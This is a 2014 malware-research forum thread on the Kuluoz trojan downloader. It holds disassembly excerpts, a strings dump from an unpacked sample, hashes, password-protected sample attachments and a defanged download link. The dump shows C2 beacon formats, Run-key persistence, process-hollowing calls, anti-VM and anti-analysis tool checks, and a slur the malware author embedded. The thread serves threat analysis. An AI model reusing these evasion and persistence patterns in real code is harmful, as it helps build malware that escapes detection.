0x0D6F7A   call dword ptr [0x0DE01Ch]   RegSetValueExA@ADVAPI32.DLL [6 Params]
0x0D6F80   test eax, eax   
0x0D6F82   jne 0x0D6F88h   target: 0x0D6F88
0x0D6F84   mov byte ptr [ebp-15h], 00000001h   
0x0D6F88   mov edx, dword ptr [ebp-10h]   xref: 0x0D6F82
0x0D6F8B   push edx   
0x0D6F8C   call dword ptr [0x0DE03Ch]   RegCloseKey@ADVAPI32.DLL [1 Params]


// The typical Kuluoz:
// "You fag!!!!!"buff :-))

0x8D633A   push 008DE774h	ASCII "Software\"
0x8D633F   mov edx, dword ptr [ebp-00000230h]	
0x8D6345   push edx	
[...]
0x8D6787   call dword ptr [0x8DE0B0h]   RtlAllocateHeap@NTDLL.DLL [3 Params]
0x8D678D   mov dword ptr [ebp-08h], eax   
0x8D6790   push 00001000h   
0x8D6795   push 00000000h   
0x8D6797   mov ecx, dword ptr [008E12D8h]   0x00AC0000
0x8D679D   push ecx   
0x8D679E   call dword ptr [0x8DE0B0h]   RtlAllocateHeap@NTDLL.DLL [3 Params]
0x8D67A4   mov dword ptr [ebp-10h], eax   
0x8D67A7   push 0x8DEF44h   		ASCII "You fag!!!!!"
0x8D67AC   mov edx, dword ptr [ebp-08h]   
0x8D67AF   push edx   
0x8D67B0   call dword ptr [008E12D0h]   strcpy@NTDLL.DLL [2 Params]
0x8D67B6   add esp, 08h   
0x8D67B9   mov eax, dword ptr [ebp+10h]   
0x8D67BC   push eax   
0x8D67BD   call dword ptr [008E12BCh]   strlen@NTDLL.DLL [2 Params]
0x8D67C3   add esp, 04h   
0x8D67C6   push eax   
0x8D67C7   mov ecx, dword ptr [ebp+10h]   
0x8D67CA   push ecx   
0x8D67CB   push 0x8DEF54h   ASCII "You fag!!!!!"
0x8D67D0   call dword ptr [008E12BCh]   strlen@NTDLL.DLL [2 Params]
0x8D67D6   add esp, 04h   
0x8D67D9   add eax, 01h   
0x8D67DC   push eax   
0x8D67DD   mov edx, dword ptr [ebp-10h]   
0x8D67E0   push edx   
0x8D67E1   mov eax, dword ptr [ebp-08h]   
0x8D67E4   push eax   
0x8D67E5   call 0x8D1E10h   target: 0x8D1E10
0x8D67EA   add esp, 14h   
0x8D67ED   mov ecx, dword ptr [ebp+18h]   
0x8D67F0   push ecx   
0x8D67F1   mov edx, dword ptr [ebp+14h]   
0x8D67F4   push edx   
0x8D67F5   push 0x8DEF64h   		ASCII "You fag!!!!!"
0x8D67FA   call dword ptr [008E12BCh]   strlen@NTDLL.DLL [2 Params]
0x8D6800   add esp, 04h   
0x8D6803   mov ecx, dword ptr [ebp-10h]   
0x8D6806   lea edx, dword ptr [ecx+eax+01h]   
0x8D680A   push edx   
0x8D680B   call dword ptr [008E12E4h]   memcpy@NTDLL.DLL [Unknown Params]
0x8D6811   add esp, 0Ch   
0x8D6814   push 0x8DEF74h   		ASCII "You fag!!!!!"
0x8D6819   call dword ptr [008E12BCh]   strlen@NTDLL.DLL [2 Params]
0x8D681F   add esp, 04h   
0x8D6822   mov ecx, dword ptr [ebp+18h]   
0x8D6825   lea edx, dword ptr [ecx+eax+01h]   
0x8D6829   mov dword ptr [ebp-14h], edx   
0x8D682C   lea eax, dword ptr [ebp-04h]   
0x8D682F   push eax   
0x8D6830   mov ecx, dword ptr [ebp+08h]   
0x8D6833   push ecx   
0x8D6834   push 80000001h   
0x8D6839   call dword ptr [0x8DE020h]   RegOpenKeyA@ADVAPI32.DLL [3 Params]
0x8D683F   test eax, eax   
0x8D6841   jne 0x8D686Fh   target: 0x8D686F
0x8D6843   mov edx, dword ptr [ebp-14h]   
0x8D6846   push edx   
0x8D6847   mov eax, dword ptr [ebp-10h]   
0x8D684A   push eax   
0x8D684B   push 00000003h   
0x8D684D   push 00000000h   
0x8D684F   mov ecx, dword ptr [ebp+0Ch]   
0x8D6852   push ecx   
0x8D6853   mov edx, dword ptr [ebp-04h]   
0x8D6856   push edx   
0x8D6857   call dword ptr [0x8DE01Ch]   RegSetValueExA@ADVAPI32.DLL [6 Params]
0x8D685D   test eax, eax   
0x8D685F   jne 0x8D6865h   target: 0x8D6865
0x8D6861   mov byte ptr [ebp-09h], 00000001h   
0x8D6865   mov eax, dword ptr [ebp-04h]   xref: 0x8D685F
0x8D6868   push eax   
0x8D6869   call dword ptr [0x8DE03Ch]   RegCloseKey@ADVAPI32.DLL [1 Params]
Sample is attached.
Thanks for sample, and malverisement data from #MalwareMustdie members.
Attachments
pwd: infected
(76.68 KiB) Downloaded 96 times

Unknown to me

 #23883  by CloneRanger
 Mon Sep 15, 2014 12:25 am
Got this in an email from support@homeandkitchen.co.za supposedly a label to print out for a USPS package that they couldn't deliver !

VT lists it as various things.

SHA256: 58007a94f3dcb7cf5b5bcdff5f3fd6e7946ff12c290acd97f23dd706e384810f
File name: Label.exe
Detection ratio: 8/55

https://www.virustotal.com/en/file/5800 ... 1410740051

PW = infected
Attachments
(72.34 KiB) Downloaded 61 times

Re: Unknown to me

 #23884  by EP_X0FF
 Mon Sep 15, 2014 4:58 am
CloneRanger wrote:Got this in an email from support@homeandkitchen.co.za supposedly a label to print out for a USPS package that they couldn't deliver !

VT lists it as various things.

SHA256: 58007a94f3dcb7cf5b5bcdff5f3fd6e7946ff12c290acd97f23dd706e384810f
File name: Label.exe
Detection ratio: 8/55

https://www.virustotal.com/en/file/5800 ... 1410740051

PW = infected
Trojan downloader Kuluoz with antivm, in attach unpacked.
https://www.virustotal.com/en/file/efa7 ... 410756972/
Code: Select all
advapi32.dll    MD5Init MD5Update   MD5Final    RtlDecompressBuffer ntdll.dll   RtlGetCompressionWorkSpaceSize  ntdll.dll   RtlCompressBuffer   ntdll.dll       Windows Explorer        Windows cannot open the file. The Windows might not support the file type or might not support the codec that was used to compress the file.    :   %d  http:// /   Software\Microsoft\Windows NT\CurrentVersion    InstallDate .txt    open    Software    For base!!!!!   For base!!!!!   For base!!!!!   For base!!!!!   Software\   For base!!!!!   For base!!!!!   For base!!!!!   http://%[^:]:%d/%s  */* Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0    POST    Content-Type: application/x-www-form-urlencoded
   svchost.exe Software\Microsoft\Windows\CurrentVersion\Run   Software\Microsoft\Windows\CurrentVersion\Run   ntdll.dll   NtQueryInformationProcess   NtReadVirtualMemory ReEMcyMH    For base!!!!!   %1024[^=]=%1024[^;] \   =   ;   For base!!!!!   For base!!!!!   %1024[^=]=%1024[^;] =   ;   d a t a     t a s k     t y p e     i d l   r u n   r e m   e a r   r d l   a u t o r u n   1   r e d   u p d   http:// Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0    s r c   n a m e     i p s   ntdll.dll   _stricmp    strcat  strlen  strcpy  sprintf sscanf  memset  memcpy  NtQueryInformationProcess   ZwReadVirtualMemory ZwMapViewOfSection  NtCreateSection ZwUnmapViewOfSection    ZwResumeThread  aa  Microsoft Base Cryptographic Provider v1.0  
   
   \   .exe    1409r   "   "   rVQBKMeNDO  0   0   index.php   <knock><id>%s</id><group>%s</group><src>%d</src><transport>%d</transport><time>%d</time><version>%d</version><status>%d</status><debug>%s</debug></knock>   \   .exe    Software\   \   \   .exe    "   Software\Microsoft\Windows\CurrentVersion\Run   %s  %[^:]:%d    Software\   Software\Microsoft\Windows\CurrentVersion\Run   2ЏхQЕУ‰№  шв!Ѓї3)6{ТІ АO˜>`none    none    none        wireshark.exe   Tfrmrpcap   iptools.exe Iris - Version 5.59 ProcessLasso_Notification_Class TSystemExplorerTrayForm.UnicodeClass    PROCMON_WINDOW_CLASS    PROCEXPL    WdcWindow   ProcessHacker   99929D61-1338-48B1-9433-D42A1D94F0D2-x64    99929D61-1338-48B1-9433-D42A1D94F0D2-x32    99929D61-1338-48B1-9433-D42A1D94F0D2    Dumper  Dumper64    APISpy32Class   VMwareDragDetWndClass   VMwareSwitchUserControlClass    vmtoolsd.exe    prl_cc.exe  prl_tools.exe   SharedIntApp.exe    VBoxTray.exe    VBoxService.exe vmusrvc.exe vmsrvc.exe  SYSTEM\CurrentControlSet\services\Disk\Enum VMware  0   PTLTD   0   Virtual 0   HARDWARE\DESCRIPTION\System\BIOS    VMware  SystemProductName   PTLTD   SystemProductName   VMware  SystemManufacturer  PTLTD   SystemManufacturer  HARDWARE\ACPI\DSDT\PTLTD__  SYSTEM\CurrentControlSet\Enum\PCI\VEN_15AD&DEV_0774&SUBSYS_040515AD&REV_00  SYSTEM\CurrentControlSet\services\Disk\Enum SYSTEM\CurrentControlSet\Enum\PCI\VEN_15AD&DEV_0774&SUBSYS_074015AD&REV_00  Virtual 0   SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00  PRLS    0   HARDWARE\DESCRIPTION\System\BIOS    Virtual SystemProductName   PRLS    SystemProductName   Virtual SystemManufacturer  PRLS    SystemManufacturer  SYSTEM\CurrentControlSet\services\Disk\Enum VBox    0   HARDWARE\DESCRIPTION\System\BIOS    VBox    SystemProductName   VBox    SystemManufacturer  HARDWARE\ACPI\DSDT\VBOX__   SYSTEM\CurrentControlSet\services\Disk\Enum AMIBI   0   HARDWARE\DESCRIPTION\System\BIOS    AMIBI   SystemProductName   AMIBI   SystemManufacturer  SYSTEM\CurrentControlSet\Enum\PCI\VEN_5333&DEV_8811&SUBSYS_00000000&REV_00  HARDWARE\ACPI\DSDT\AMIBI    SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_BEEF&SUBSYS_00000000&REV_00      SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00  You fag!!!!!    You fag!!!!!    You fag!!!!!    You fag!!!!!    You fag!!!!!    You fag!!!!!    You fag!!!!!    You fag!!!!!    You fag!!!!!    You fag!!!!!    Software    You fag!!!!!    You fag!!!!!    You fag!!!!!    Software\   Software    For group!!!!!  For group!!!!!  For group!!!!!  Software\   For group!!!!!  For group!!!!!  For group!!!!!  For group!!!!!  јт          Ах  \а  xу          тх  б  `т          >ч   а  pу          fч  б  ёу          –ч  Xб  dу           ч  б  ¤у          ®ч  Dб  „у          Dш  $б  <у          ¬ш  Ьа  ¬т          щ  Lа                      ¶ц  тц  вц  Кц  ¦ц  –ц  „ц  vц  fц  Vц  Fц  0ц   ц  ц  юх  ч  &ч  ч      Рш  ёш  мш      ђх   х  Мф  ‚х  nх  Zх  Jх  ¶ф  Ёф  њф  0х  "х  х  ьф  рф  Ъф  Њф  zф  lф  `ф  Rф  @ф  4ф  (ф  ф  ф  Ду  цу  жу  Фу  °х      љш  Xш  bш  lш  xш  „ш  ђш  Pш  ўш        Ђ  Ђ    Lч      Ьх  Ох      Рч  дч  шч  ш  ш  0ш  єч      s  Ђt  Ђ  Ђ  Ђ    †ч  rч      “GetTickCount  EGetProcAddress  <LoadLibraryA  мVirtualFree йVirtualAlloc  GetModuleHandleA  ПHeapFree  ЛHeapAlloc JGetProcessHeap  R CloseHandle %WriteFile € CreateFileA ¤ CreateProcessA  ResumeThread  YSetEvent  tOpenEventA  WideCharToMultiByte ЂOpenProcess БGetCurrentProcessId АReadFile  мGetFileInformationByHandle  ІSleep У DeleteFileA yGetSystemTimeAsFileTime µ CreateThread  АTerminateProcess  АGetCurrentProcess НHeapCreate  ъReleaseMutex  GetLastError  › CreateMutexA  KERNEL32.dll  MessageBoxA -GetForegroundWindow USER32.dll  0RegCloseKey mRegQueryValueExA  `RegOpenKeyExA ЋLookupAccountNameA  dGetUserNameA  QRegEnumValueA NRegEnumKeyExA _RegOpenKeyA }RegSetValueExA  7RegCreateKeyA =RegDeleteKeyA ¶ CryptDestroyHash  Х CryptVerifySignatureA И CryptHashData і CryptCreateHash є CryptEncrypt  GRegDeleteValueA ° CryptAcquireContextA  ADVAPI32.dll  а SHGetSpecialFolderPathA SHELL32.dll  CoCreateInstance  > CoInitialize  ole32.dll OLEAUT32.dll  WS2_32.dll  k InternetCloseHandle џ InternetReadFile  ˜ InternetOpenUrlA  — InternetOpenA [ HttpSendRequestA  W HttpOpenRequestA  q InternetConnectA  WININET.dll ^free  ‘malloc  ™memset  сwcstombs  к_wcsicmp  “mbstowcs  Еstrstr  =atoi  —memcpy  MSVCRT.dll  Ш CryptStringToBinaryA  ¤ CryptImportPublicKeyInfo  ѓ CryptDecodeObjectEx CRYPT32.dll       я(T    Bщ           8щ  <щ  @щ  ЂP  Jщ    dll.dll Work                                                                                                                                                                                  -±dЉ>x[.№)S6ЬЏВ°љеѓКС~Ґ*Ѓ}‚EФ°чВZё6бYsY.µЭeгL¤бrо?xu©°†'‹&[D  ЁМV3Ў SЙ‡’7-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDh1cXNl5TSGcC5OrnDBc+fdN/0
PblnZEAOlryK65eKdaNAIi0okxHTfCHKZQWEz8LOzQRclzg+SilO+jbesgZg/Y7U
c8edpo93cM0eyVE7Pi5n73I/lLyvD/gDby80FQmj1sbayyHR2DG8heeJJ2TRTfzD
r6V/45jRqvvUfgl+swIDAQAB
-----END PUBLIC KEY-----    
1.0.6, 6-Sept-2010
Attachments
pass: malware
(29.78 KiB) Downloaded 69 times

Re: Win32/Kuluoz

 #24538  by etnguyen03
 Fri Dec 05, 2014 11:10 pm
Fresh one. From "Best Buy".
Link: [url]hxxps://app.box.com/s/1aa10jiofpiyvocxag8r[/url]
pw: infected
Enjoy!
 Return to “Malware”